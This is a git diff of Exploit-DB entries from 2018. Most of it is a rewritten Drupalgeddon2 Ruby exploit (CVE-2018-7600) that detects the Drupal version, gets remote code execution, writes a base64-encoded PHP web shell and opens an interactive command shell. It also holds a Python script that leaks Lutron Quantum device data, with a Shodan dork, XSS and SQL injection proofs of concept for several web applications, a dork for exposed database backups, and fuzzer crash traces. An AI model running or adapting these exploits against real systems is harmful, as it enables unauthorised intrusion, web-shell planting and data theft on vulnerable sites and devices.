diff --git a/exploits/hardware/webapps/44320.txt b/exploits/hardware/webapps/44320.txt new file mode 100644 index 000000000..09a3261f6 --- /dev/null +++ b/exploits/hardware/webapps/44320.txt @@ -0,0 +1,26 @@ +###################################################################################### +# Exploit Title: Coship RT3052 Wireless Router - Persistent Cross Site Scripting (XSS) +# Date: 2018-03-18 +# Exploit Author: Sayan Chatterjee +# Vendor Homepage: http://en.coship.com/ +# Category: Hardware (Wifi Router) +# Version: 4.0.0.48 +# Tested on: Windows 10 +# CVE: CVE-2018-8772 +####################################################################################### + +Proof of Concept +================= +URL: http://192.168.1.254 (Wifi Router Gateway) +Attack Vector : Network Name(SSID) +Payload : + +Reproduction Steps: +------------------------------ +1. Access the wifi router gateway [i.e, http://192.168.1.254] +2. Go to "Wireless Setting" -> "Basic" +3. Update "Network Name(SSID)" field with '' +4. Save the settings. +5. Go to "System Status" and you will be having "S@Y@N" popup. + +####################################################################################### \ No newline at end of file diff --git a/exploits/hardware/webapps/44488.py b/exploits/hardware/webapps/44488.py new file mode 100755 index 000000000..5dabe1804 --- /dev/null +++ b/exploits/hardware/webapps/44488.py @@ -0,0 +1,69 @@ +''' + +# Exploit Title: Login bypass and data leak - Lutron Quantum 2.0 - 3.2.243 firmware +# Date: 20-03-2018 +# Exploit Author: David Castro +# Contact: https://twitter.com/SadFud75 +# Vendor Homepage: http://www.lutron.com +# Software Link: http://www.lutron.com/en-US/Products/Pages/WholeBuildingSystems/Quantum/Overview.aspx +# Version: Lutron Quantum 2.0 - 3.2.243 firmware +# CVE : CVE-2018-8880 +# Shodan dork: html:"

LUTRON

" + +Python 2.7 Output: + +Leaking data from HOST +[+] Device info: + +MAC: 000FE702A999 +PRODUCT FAMILY: Gulliver +PRODUCT TYPE: Processor +SERIAL NUMBER: 007B24B4 +GUID: 0DFB959BD0D8784DA9501B958F099779 +CODE VERSION: 7.5.0 + +[+] Network info: + +INTERNAL IP: 192.168.0.2 +SUBNET MASK: 255.255.255.0 +GATEWAY: 192.168.0.1 +TELNET PORT: 23 +FTP PORT: 21 +REMOTE PORT: 51023 + +[+] Done. + +''' + + +import requests +from bs4 import BeautifulSoup + +ip = raw_input("Enter target ip: ") +port = raw_input("Enter target port: ") + +print 'Leaking data from ' + 'http://' + ip + ":" + port +r = requests.get('http://' + ip + ":" + port + '/deviceIP') +resultado = r.text +parseado = BeautifulSoup(resultado, "lxml") + +print '[+] Device info:' +print '' +print 'MAC: ' + parseado.find('input', {'name': 'MacAddr'}).get('value') +print 'PRODUCT FAMILY: ' + parseado.find('input', {'name': 'PRODFAM'}).get('value') +print 'PRODUCT TYPE: ' + parseado.find('input', {'name': 'PRODTYPE'}).get('value') +print 'SERIAL NUMBER: ' + parseado.find('input', {'name': 'SERNUM'}).get('value') +print 'GUID: ' + parseado.find('input', {'name': 'GUID'}).get('value') +print 'CODE VERSION: ' + parseado.find('input', {'name': 'CODEVER'}).get('value') +print '' +print '[+] Network info:' +print '' +print 'INTERNAL IP: ' + parseado.find('input', {'name': 'IPADDR'}).get('value') +print 'SUBNET MASK: ' + parseado.find('input', {'name': 'SUBNETMK'}).get('value') +print 'GATEWAY: ' + parseado.find('input', {'name': 'GATEADDR'}).get('value') +print 'TELNET PORT: ' + parseado.find('input', {'name': 'TELPORT'}).get('value') +print 'FTP PORT: ' + parseado.find('input', {'name': 'FTPPORT'}).get('value') +print 'REMOTE PORT: ' + parseado.find('input', {'name': 'REMOTEPORT'}).get('value') +print '' +print '[+] Done.' +print '' \ No newline at end of file diff --git a/exploits/linux/dos/44490.txt b/exploits/linux/dos/44490.txt new file mode 100644 index 000000000..3599abc0c --- /dev/null +++ b/exploits/linux/dos/44490.txt @@ -0,0 +1,68 @@ +# Exploit Title: PDFunite Malformed pdf buffer overflow +# Date: 17 April 2018 +# Exploit Author: Hamm3r.py +# Vendor Homepage: https://launchpad.net/ubuntu/artful/+package/poppler-utils +# Software Link: https://launchpad.net/ubuntu/+source/poppler/0.57.0-2ubuntu4.2 +# Version: 0.41.0 +# Tested on: Ubuntu +# CVE : + +pdfunite is a part of poppler package in ubuntu. pdfunite is prone to a +local bufferoverflow when a malformed pdf is used to unite with another +pdf. +Following is the gdb stack trace: + +Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". + +Program received signal SIGSEGV, Segmentation fault. +0x00007ffff7abf948 in XRef::getEntry(int, bool) () from +/usr/lib/x86_64-linux-gnu/libpoppler.so.58 +#0 0x00007ffff7abf948 in XRef::getEntry(int, bool) () from +/usr/lib/x86_64-linux-gnu/libpoppler.so.58 +#1 0x00007ffff7aa8867 in PDFDoc::markObject(Object*, XRef*, XRef*, +unsigned int, int, int, std::set, +std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58 +#2 0x00007ffff7aa85a3 in PDFDoc::markDictionnary(Dict*, XRef*, XRef*, +unsigned int, int, int, std::set, +std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58 +#3 0x00007ffff7aa884c in PDFDoc::markObject(Object*, XRef*, XRef*, +unsigned int, int, int, std::set, +std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58 +#4 0x00007ffff7aa8971 in PDFDoc::markObject(Object*, XRef*, XRef*, +unsigned int, int, int, std::set, +std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58 +#5 0x00007ffff7aa85a3 in PDFDoc::markDictionnary(Dict*, XRef*, XRef*, +unsigned int, int, int, std::set, +std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58 +#6 0x00007ffff7aa884c in PDFDoc::markObject(Object*, XRef*, XRef*, +unsigned int, int, int, std::set, +std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58 +#7 0x00007ffff7aa8971 in PDFDoc::markObject(Object*, XRef*, XRef*, +unsigned int, int, int, std::set, +std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58 +#8 0x00007ffff7aa85a3 in PDFDoc::markDictionnary(Dict*, XRef*, XRef*, +unsigned int, int, int, std::set, +std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58 +#9 0x00007ffff7aa884c in PDFDoc::markObject(Object*, XRef*, XRef*, +unsigned int, int, int, std::set, +std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58 +#10 0x00007ffff7aa8bae in PDFDoc::markPageObjects(Dict*, XRef*, XRef*, +unsigned int, int, int, std::set, +std::allocator >*) () from /usr/lib/x86_64-linux-gnu/libpoppler.so.58 +#11 0x000000000040271a in ?? () +#12 0x00007ffff722d830 in __libc_start_main (main=0x401b20, argc=4, +argv=0x7fffffffe0b8, init=, fini=, +rtld_fini=, stack_end=0x7fffffffe0a8) at +../csu/libc-start.c:291 +#13 0x0000000000403179 in ?? () + + +$ pdfunite -v +pdfunite version 0.41.0 + + +#This issue is identified by Hamm3r.py, a general purpose fuzzer! + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44490.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44491.txt b/exploits/multiple/dos/44491.txt new file mode 100644 index 000000000..1dd65fabb --- /dev/null +++ b/exploits/multiple/dos/44491.txt @@ -0,0 +1,100 @@ +# Exploit Title: Buffer-overflow in RSVG while converting a malformed svg +# Date: 17 April 2018 +# Exploit Author: Hamm3r.py +# Vendor Homepage: *https://launchpad.net/ubuntu/xenial/+package/librsvg2-bin +# Software Link: *https://launchpad.net/ubuntu/xenial/+package/librsvg2-bin +# Version: Ubuntu: 2.40.13 (Default version that is shipped with ubuntu) and MAC 2.42.2 +# Tested on: Ubuntu 16.04 and MAC 10.13.3 + + +RSVG throws a segmentation fault when malformed SVG is submitted as input. + +Steps to reproduce: +rsvg test.png + + +GDB Stacktrace below: +Starting program: /usr/bin/rsvg fuzzed_fdiA0xdf5OQPYsN hello.png +[Thread debugging using libthread_db enabled] +Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". + +Program received signal SIGSEGV, Segmentation fault. +_fill_xrgb32_lerp_opaque_spans (abstract_renderer=0x7fffffffbea0, y=18219, +h=1, spans=, +num_spans=) at +../../../../src/cairo-image-compositor.c:2249 +2249 ../../../../src/cairo-image-compositor.c: No such file or directory. +(gdb) backtrace +#0 0x00007ffff6fd35c0 in _fill_xrgb32_lerp_opaque_spans +(abstract_renderer=0x7fffffffbea0, y=18219, h=1, spans=, +num_spans=) at ../../../../src/cairo-image-compositor.c:2249 +#1 0x00007ffff7017921 in _cairo_tor_scan_converter_generate (xmax=248, +xmin=192, height=1, y=18219, spans=0x63e438, renderer=0x7fffffffbea0, +cells=) +at ../../../../src/cairo-tor-scan-converter.c:1643 +#2 0x00007ffff7017921 in _cairo_tor_scan_converter_generate +(renderer=0x7fffffffbea0, antialias=1, winding_mask=, +converter=) at +../../../../src/cairo-tor-scan-converter.c:1794 +#3 0x00007ffff7017921 in _cairo_tor_scan_converter_generate +(converter=0x63d3b0, renderer=0x7fffffffbea0) +at ../../../../src/cairo-tor-scan-converter.c:1857 +#4 0x00007ffff7009c33 in composite_polygon +(extents=extents@entry=0x7fffffffd780, +polygon=polygon@entry=0x7fffffffd360, +fill_rule=fill_rule@entry=CAIRO_FILL_RULE_WINDING, +antialias=antialias@entry=CAIRO_ANTIALIAS_DEFAULT, +compositor=0x7ffff72b2040 , compositor=0x7ffff72b2040 ) +at ../../../../src/cairo-spans-compositor.c:801 +#5 0x00007ffff700a6a5 in clip_and_composite_polygon +(compositor=compositor@entry=0x7ffff72b2040 , +extents=extents@entry=0x7fffffffd780, +polygon=polygon@entry=0x7fffffffd360, fill_rule=CAIRO_FILL_RULE_WINDING, +antialias=antialias@entry=CAIRO_ANTIALIAS_DEFAULT) at +../../../../src/cairo-spans-compositor.c:967 +#6 0x00007ffff700b5d3 in _cairo_spans_compositor_fill +(_compositor=0x7ffff72b2040 , extents=0x7fffffffd780, +path=, fill_rule=CAIRO_FILL_RULE_WINDING, +tolerance=0.10000000000000001, antialias=CAIRO_ANTIALIAS_DEFAULT) at +../../../../src/cairo-spans-compositor.c:1174 +#7 0x00007ffff6fc5a90 in _cairo_compositor_fill (compositor=0x7ffff72b2040 +, surface=0x6399a0, op=, source=, +path=0x639768, fill_rule=CAIRO_FILL_RULE_WINDING, +tolerance=0.10000000000000001, antialias=CAIRO_ANTIALIAS_DEFAULT, clip=0x0) +at ../../../../src/cairo-compositor.c:203 +#8 0x00007ffff6fd7127 in _cairo_image_surface_fill +(abstract_surface=, op=, source=, path=, fill_rule=, tolerance=, antialias=, clip=0x0) at +../../../../src/cairo-image-surface.c:985 +#9 0x00007ffff700e7d7 in _cairo_surface_fill (surface=0x6399a0, +op=CAIRO_OPERATOR_OVER, source=0x7fffffffdb50, path=0x639768, +fill_rule=CAIRO_FILL_RULE_WINDING, tolerance=0.10000000000000001, +antialias=CAIRO_ANTIALIAS_DEFAULT, clip=0x0) at +../../../../src/cairo-surface.c:2341 +#10 0x00007ffff6fce14c in _cairo_gstate_fill (gstate=0x630c00, +path=path@entry=0x639768) +at ../../../../src/cairo-gstate.c:1317 +#11 0x00007ffff6fc7279 in _cairo_default_context_fill (abstract_cr=0x639400) +at ../../../../src/cairo-default-context.c:1055 +#12 0x00007ffff6fc02b5 in cairo_fill (cr=0x639400) at +../../../../src/cairo.c:2205 +#13 0x00007ffff7bc9e95 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2 +#14 0x00007ffff7bc6272 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2 +#15 0x00007ffff7bbd4c0 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2 +#16 0x00007ffff7bbd4c0 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2 +#17 0x00007ffff7bbd982 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2 +#18 0x00007ffff7bbe298 in () at /usr/lib/x86_64-linux-gnu/librsvg-2.so.2 +#19 0x00007ffff7bca9e3 in rsvg_handle_render_cairo_sub () at +/usr/lib/x86_64-linux-gnu/librsvg-2.so.2 + + +Version: +$rsvg-convert --version +rsvg-convert version 2.42.2 + +#This issue is identified by Hamm3r.py, a general purpose fuzzer! + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44491.zip \ No newline at end of file diff --git a/exploits/multiple/webapps/44487.txt b/exploits/multiple/webapps/44487.txt new file mode 100644 index 000000000..a1267a293 --- /dev/null +++ b/exploits/multiple/webapps/44487.txt @@ -0,0 +1,82 @@ +============================================= +MGC ALERT 2018-003 +- Original release date: March 19, 2018 +- Last revised: April 16, 2018 +- Discovered by: Manuel Garcia Cardenas +- Severity: 4,8/10 (CVSS Base Score) +- CVE-ID: CVE-2018-8831 +============================================= + +I. VULNERABILITY +------------------------- +Kodi <= 17.6 - Persistent Cross-Site Scripting + +II. BACKGROUND +------------------------- +Kodi (formerly XBMC) is a free and open-source media player software +application developed by the XBMC Foundation, a non-profit technology +consortium. Kodi is available for multiple operating systems and hardware +platforms, with a software 10-foot user interface for use with televisions +and remote controls. + +III. DESCRIPTION +------------------------- +Has been detected a Persistent XSS vulnerability in the web interface of +Kodi, that allows the execution of arbitrary HTML/script code to be +executed in the context of the victim user's browser. + +IV. PROOF OF CONCEPT +------------------------- +Go to: Playlist -> Create + +Create a playlist injecting javascript code: + + + +The XSS is executed, in the victim browser. + +V. BUSINESS IMPACT +------------------------- +An attacker can execute arbitrary HTML or script code in a targeted user's +browser, this can leverage to steal sensitive information as user +credentials, personal data, etc. + +VI. SYSTEMS AFFECTED +------------------------- +Kodi <= 17.6 + +VII. SOLUTION +------------------------- +Vendor include the fix: +https://trac.kodi.tv/ticket/17814 + +VIII. REFERENCES +------------------------- +https://kodi.tv/ + +IX. CREDITS +------------------------- +This vulnerability has been discovered and reported +by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). + +X. REVISION HISTORY +------------------------- +March 19, 2018 1: Initial release +April 16, 2018 2: Last revision + +XI. DISCLOSURE TIMELINE +------------------------- +March 19, 2018 1: Vulnerability acquired by Manuel Garcia Cardenas +March 19, 2018 2: Send to vendor +March 30, 2018 3: Vendo fix +April 16, 2018 4: Sent to lists + +XII. LEGAL NOTICES +------------------------- +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. + +XIII. ABOUT +------------------------- +Manuel Garcia Cardenas +Pentester \ No newline at end of file diff --git a/exploits/php/webapps/44449.rb b/exploits/php/webapps/44449.rb index b9a1bda11..e476524c6 100755 --- a/exploits/php/webapps/44449.rb +++ b/exploits/php/webapps/44449.rb @@ -1,27 +1,10 @@ #!/usr/bin/env ruby # -# Hans Topo & g0tmi1k's ruby port of Drupalggedon2 exploit ~ https://github.com/dreadlocked/Drupalgeddon2/ (EDBID: 44449 ~ https://www.exploit-db.com/exploits/44449/) -# Based on Vitalii Rudnykh exploit ~ https://github.com/a2u/CVE-2018-7600 (EDBID: 44448 ~ https://www.exploit-db.com/exploits/44448/) -# Hans Topo ~ https://github.com/dreadlocked -# g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k +# [CVE-2018-7600] Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/ # -# Drupal Advisory ~ https://www.drupal.org/sa-core-2018-002 -# Vulnerable Versions: -# < 7.58 -# 8.x < 8.3.9 -# 8.4.x < 8.4.6 (TESTED) -# 8.5.x < 8.5.1 (TESTED) -# -# WriteUp & Thx ~ https://research.checkpoint.com/uncovering-drupalgeddon-2/ -# REF phpinfo() ~ https://twitter.com/i_bo0om/status/984674893768921089 (curl - user/register - mail - #post_render) -# REF phpinfo() ~ https://twitter.com/RicterZ/status/984495201354854401 (burp - user//edit [requires auth] - mail - #lazy_builder) -# REF 2x RCE ~ https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708 (curl - user/register - mail & timezone - #lazy_builder & #post_render) -# REF RCE ~ https://gist.github.com/AlbinoDrought/626c07ee96bae21cb174003c9c710384 (curl - user/register - mail - #post_render) -# REF rev_nc ~ https://gist.github.com/AlbinoDrought/2854ca1b2a9a4f33ca87581cf1e1fdd4 (curl - user/register - mail - #post_render) -# Collection ~ https://github.com/g0rx/CVE-2018-7600-Drupal-RCE -# -# -# Drupal Version ~ https://example.com/CHANGELOG.txt +# Authors: +# - Hans Topo ~ https://github.com/dreadlocked // https://twitter.com/_dreadlocked +# - g0tmi1k ~ https://blog.g0tmi1k.com/ // https://twitter.com/g0tmi1k # @@ -29,114 +12,297 @@ require 'base64' require 'json' require 'net/http' require 'openssl' +require 'readline' -# Proxy information (nil to disable) +# Settings - Proxy information (nil to disable) proxy_addr = nil proxy_port = 8080 -# Quick how to use -if ARGV.empty? - puts "Usage: ruby drupalggedon2.rb " - puts " ruby drupalgeddon2.rb https://example.com whoami" - exit +# Settings - General +$useragent = "drupalgeddon2" +webshell = "s.php" +writeshell = true + + +# Settings - Payload (we could just be happy without this, but we can do better!) +#bashcmd = "' +bashcmd = "&1' ); }" +bashcmd = "echo " + Base64.strict_encode64(bashcmd) + " | base64 -d" + + +# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + +# Function http_post [post] +def http_post(url, payload="") + uri = URI(url) + request = Net::HTTP::Post.new(uri.request_uri) + request.initialize_http_header({"User-Agent" => $useragent}) + request.body = payload + return $http.request(request) end + +# Function gen_evil_url +def gen_evil_url(evil, feedback=true) + # PHP function to use (don't forget about disabled functions...) + phpmethod = $drupalverion.start_with?('8')? "exec" : "passthru" + + #puts "[*] PHP cmd: #{phpmethod}" if feedback + puts "[*] Payload: #{evil}" if feedback + + ## Check the version to match the payload + # Vulnerable Parameters: #access_callback / #lazy_builder / #pre_render / #post_render + if $drupalverion.start_with?('8') + # Method #1 - Drupal 8, mail, #post_render - response is 200 + url = $target + "user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" + payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpmethod + "&mail[a][#type]=markup&mail[a][#markup]=" + evil + + # Method #2 - Drupal 8, timezone, #lazy_builder - response is 500 & blind (will need to disable target check for this to work!) + #url = $target + "user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax" + #payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil + elsif $drupalverion.start_with?('7') + # Method #3 - Drupal 7, name, #post_render - response is 200 + url = $target + "?q=user/password&name[%23post_render][]=" + phpmethod + "&name[%23type]=markup&name[%23markup]=" + evil + payload = "form_id=user_pass&_triggering_element_name=name" + else + puts "[!] Unsupported Drupal version" + exit + end + + # Drupal v7 needs an extra value from a form + if $drupalverion.start_with?('7') + response = http_post(url, payload) + + form_build_id = response.body.match(/input type="hidden" name="form_build_id" value="(.*)"/).to_s().slice(/value="(.*)"/, 1).to_s.strip + puts "[!] WARNING: Didn't detect form_build_id" if form_build_id.empty? + + #url = $target + "file/ajax/name/%23value/" + form_build_id + url = $target + "?q=file/ajax/name/%23value/" + form_build_id + payload = "form_build_id=" + form_build_id + end + + return url, payload +end + + +# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + +# Quick how to use +if ARGV.empty? + puts "Usage: ruby drupalggedon2.rb " + puts " ruby drupalgeddon2.rb https://example.com" + exit +end # Read in values -target = ARGV[0] -command = ARGV[1] +$target = ARGV[0] + + +# Check input for protocol +if not $target.start_with?('http') + $target = "http://#{target}" +end +# Check input for the end +if not $target.end_with?('/') + $target += "/" +end + + +# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - # Banner puts "[*] --==[::#Drupalggedon2::]==--" puts "-"*80 +puts "[*] Target : #{$target}" +puts "[*] Write? : Skipping writing web shell" if not writeshell +puts "-"*80 -# Check input for protocol -if not target.start_with?('http') - target = "http://" + target -end - -# Check input for the end -if not target.end_with?('/') - target += "/" -end +# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -# Payload -#evil = 'uname -a' -evil = '' -evil = "echo " + Base64.encode64(evil).strip + " | base64 -d | tee s.php" +# Setup connection +uri = URI($target) +$http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port) -# PHP function to use -phpmethod = 'exec' - - -# Feedback -puts "[*] Target : " + target -puts "[*] Command: " + command -puts "[*] PHP cmd: " + phpmethod - - -# Method #1 - timezone & lazy_builder - response is 500 & blind (will need to disable target check for this to work!) -#url = target + 'user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax' -# Vulnerable Parameters: access_callback / lazy_builder / pre_render/ post_render -#payload = "form_id=user_register_form&_drupal_ajax=1&timezone[a][#lazy_builder][]=exec&timezone[a][#lazy_builder][][]=" + evil - - -# Method #2 - mail & post_render - response is 200 -url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' -# Vulnerable Parameters: access_callback / lazy_builder / pre_render/ post_render -payload = "form_id=user_register_form&_drupal_ajax=1&mail[a][#post_render][]=" + phpmethod + "&mail[a][#type]=markup&mail[a][#markup]=" + evil - - -uri = URI(url) -http = Net::HTTP.new(uri.host, uri.port, proxy_addr, proxy_port) - # Use SSL/TLS if needed -if uri.scheme == 'https' - http.use_ssl = true - http.verify_mode = OpenSSL::SSL::VERIFY_NONE +if uri.scheme == "https" + $http.use_ssl = true + $http.verify_mode = OpenSSL::SSL::VERIFY_NONE +end + + +# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + +# Try and get version +$drupalverion = nil +# Possible URLs +url = [ + $target + "CHANGELOG.txt", + $target + "core/CHANGELOG.txt", + $target + "includes/bootstrap.inc", + $target + "core/includes/bootstrap.inc", +] +# Check all +url.each do|uri| + # Check response + response = http_post(uri) + + if response.code == "200" + puts "[+] Found : #{uri} (#{response.code})" + + # Patched already? + puts "[!] WARNING: Might be patched! Found SA-CORE-2018-002: #{url}" if response.body.include? "SA-CORE-2018-002" + + # Try and get version from the file contents + $drupalverion = response.body.match(/Drupal (.*),/).to_s.slice(/Drupal (.*),/, 1).to_s.strip + + # If not, try and get it from the URL + $drupalverion = uri.match(/core/)? "8.x" : "7.x" if $drupalverion.empty? + + # Done! + break + elsif response.code == "403" + puts "[+] Found : #{uri} (#{response.code})" + + # Get version from URL + $drupalverion = uri.match(/core/)? "8.x" : "7.x" + else + puts "[!] MISSING: #{uri} (#{response.code})" + end end -# Make the request -req = Net::HTTP::Post.new(uri.request_uri) -req.body = payload # Feedback -puts "[*] Payload: " + evil -#puts "[*] Sending: " + payload -puts "-"*80 - - -# Check response -response = http.request(req) -if response.code == "200" - puts "[+] Target seems to be exploitable! w00hooOO!" - puts "[+] Result: " + JSON.pretty_generate(JSON[response.body] ) +if $drupalverion + status = $drupalverion.end_with?('x')? "?" : "!" + puts "[+] Drupal#{status}: #{$drupalverion}" else - puts "[!] Target does NOT seem to be exploitable ~ Response: " + response.code - #exit + puts "[!] Didn't detect Drupal version" + puts "[!] Forcing Drupal v8.x attack" + $drupalverion = "8.x" end - - -# Feedback -puts "-"*80 -puts "[*] curl '" + target + "s.php?c=#{command}'" puts "-"*80 -# Now run our command -exploit_uri = URI(target + "s.php?c=#{command}") -# Check response -response = Net::HTTP.get_response(exploit_uri) -if response.code != "200" - puts "[!] Exploit FAILED ~ Response: " + response.code + +# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + + +# Make a request, testing code execution +puts "[*] Testing: Code Execution" +# Generate a random string to see if we can echo it +random = (0...8).map { (65 + rand(26)).chr }.join +url, payload = gen_evil_url("echo #{random}") +response = http_post(url, payload) +if response.code == "200" and not response.body.empty? + #result = JSON.pretty_generate(JSON[response.body]) + result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body + puts "[+] Result : #{result}" + + puts response.body.match(/#{random}/)? "[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!" : "[+] Target might to be exploitable?" +else + puts "[!] Target is NOT exploitable ~ HTTP Response: #{response.code}" exit end +puts "-"*80 -# Result -puts "[+] Output: " + response.body \ No newline at end of file +# Location of web shell & used to signal if using PHP shell +webshellpath = nil +prompt = "drupalgeddon2" +# Possibles paths to try +paths = [ + "./", + "./sites/default/", + "./sites/default/files/", +] +# Check all +paths.each do|path| + puts "[*] Testing: File Write To Web Root (#{path})" + + # Merge locations + webshellpath = "#{path}#{webshell}" + + # Final command to execute + cmd = "#{bashcmd} | tee #{webshellpath}" + + # Generate evil URLs + url, payload = gen_evil_url(cmd) + # Make the request + response = http_post(url, payload) + # Check result + if response.code == "200" and not response.body.empty? + # Feedback + #result = JSON.pretty_generate(JSON[response.body]) + result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body + puts "[+] Result : #{result}" + + # Test to see if backdoor is there (if we managed to write it) + response = http_post("#{$target}#{webshellpath}", "c=hostname") + if response.code == "200" and not response.body.empty? + puts "[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!" + break + else + puts "[!] Target is NOT exploitable. No write access here!" + end + else + puts "[!] Target is NOT exploitable for some reason ~ HTTP Response: #{response.code}" + end + webshellpath = nil +end if writeshell +puts "-"*80 if writeshell + +if webshellpath + # Get hostname for the prompt + prompt = response.body.to_s.strip + + # Feedback + puts "[*] Fake shell: curl '#{$target}#{webshell}' -d 'c=whoami'" +elsif writeshell + puts "[!] FAILED to find writeable folder" + puts "[*] Dropping back to ugly shell..." +end + + +# Stop any CTRL + C action ;) +trap("INT", "SIG_IGN") + + +# Forever loop +loop do + # Default value + result = "ERROR" + + # Get input + command = Readline.readline("#{prompt}>> ", true).to_s + + # Exit + break if command =~ /exit/ + + # Blank link? + next if command.empty? + + # If PHP shell + if webshellpath + # Send request + result = http_post("#{$target}#{webshell}", "c=#{command}").body + # Direct commands + else + url, payload = gen_evil_url(command, false) + response = http_post(url, payload) + if response.code == "200" and not response.body.empty? + result = $drupalverion.start_with?('8')? JSON.parse(response.body)[0]["data"] : response.body + end + end + + # Feedback + puts result +end \ No newline at end of file diff --git a/exploits/php/webapps/44483.txt b/exploits/php/webapps/44483.txt new file mode 100644 index 000000000..9719a5d12 --- /dev/null +++ b/exploits/php/webapps/44483.txt @@ -0,0 +1,24 @@ +# Exploit Title: MySQL Squid Access Report 2.1.4 Multiple Vulnerabilities +# Date: 14-13-2018 +# Software Link: https://sourceforge.net/projects/mysar/ +# Exploit Author: Keerati T. +# Version: 2.1.4 +# Tested on: Linux + +1. Description +SQL injection and Cross site script vulnerabilities are found on ALL +parameter of MySAR. + +2. Proof of Concept +FOR EXAMPLE +- SQL injection +http://server/mysar/index.php?a=IPSummary&date=[SQLi] +-XSS +http://server/mysar/index.php?a=IPSummary&date=2018-04-14 +"> + +3. Timeline +8-3-2018 - Report on their Github. ( +https://github.com/coffnix/mysar-ng/issues/12) +-- 1 month later, no any response from vendor. -- +14-4-2018 - Public. \ No newline at end of file diff --git a/exploits/php/webapps/44484.txt b/exploits/php/webapps/44484.txt new file mode 100644 index 000000000..c4b1f3467 --- /dev/null +++ b/exploits/php/webapps/44484.txt @@ -0,0 +1,13 @@ +# Exploit Title: Rvsitebuilder CMS Database Backup Download +# Exploit Author: Hesam Bazvand +# Contact: black.king066@gmail.com +# Software Link: http://www.rvsitebuilder.com +# Version: All Version +# Tested on: Windows 7 / Kali Linux +# Category: WebApps +# Dork : inurl:rvsindex.php & /rvsindex.php?/user/login + +*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*# + +Exploit : + Http://Target/rvsDbBackup.sql \ No newline at end of file diff --git a/exploits/php/webapps/44486.txt b/exploits/php/webapps/44486.txt new file mode 100644 index 000000000..18a84dbbe --- /dev/null +++ b/exploits/php/webapps/44486.txt @@ -0,0 +1,28 @@ +######################################################################## +# Exploit Title: Match Clone Script 1.0.4 - Cross-Site Scripting +# Date: 23.02.2018 +# Vendor Homepage: https://www.phpscriptsmall.com/ +# Software Link: https://www.phpscriptsmall.com/product/match-clone/ +# Category: Web Application +# Exploit Author: ManhNho +# Version: 1.0.4 +# Tested on: Window 10 / Kali Linux +# CVE: CVE-2018-9857 +########################################################################## +Description +------------------------ +PHP Scripts Mall Match Clone Script 1.0.4 has XSS via the search field to +searchbyid.php (aka the "View Search By Id" screen). + +Proof of Concept +------------------------ +1. Access to site +2. Choose “Search” +3. Choose "View Search By Id" +3. Put in search field +4. You will be having a popup: ManhNho + +References: +------------------------ +https://pastebin.com/Y9uEC4nu +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9857 \ No newline at end of file diff --git a/exploits/php/webapps/44489.txt b/exploits/php/webapps/44489.txt new file mode 100644 index 000000000..b64ed4969 --- /dev/null +++ b/exploits/php/webapps/44489.txt @@ -0,0 +1,159 @@ +# Exploit Title: CalderaForms 1.5.9.1 - multiple XSS +# Date: 02-03-2018 +# Exploit Author: Federico Scalco +# fscalco at mentat dot is +# @mindpr00f +# Vendor Homepage: https://calderaforms.com/ +# Software Link: https://wordpress.org/plugins/caldera-forms/ +# Vulnerable App: https://github.com/CalderaWP/Caldera-Forms/archive/1.5.9.1.zip +# Version: 1.5.9.1 (older versions may also be affected) +# Tested on: WordPress 4.9.4 +# CVE : CVE-2018-7747 + + + +1) SOFTWARE DESCRIPTION +"Caldera Form is a free and powerful WordPress plugin that creates +responsive forms with a simple drag and drop editor." +It is reported to have 